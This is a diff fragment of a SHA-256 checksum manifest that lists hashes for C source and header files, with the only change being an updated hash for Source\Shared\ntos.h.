@@ -75,7 +77,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h -eeb7e2580b8f304693d200b48a0664600d86a9b8323a36fd65e8ed394d563964 *Source\Shared\ntos.h +0eee79ee4fa4692222fc647159ac532dc2019f568160ca4c9fed9de9cc39b593 *Source\Shared\ntos.h b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c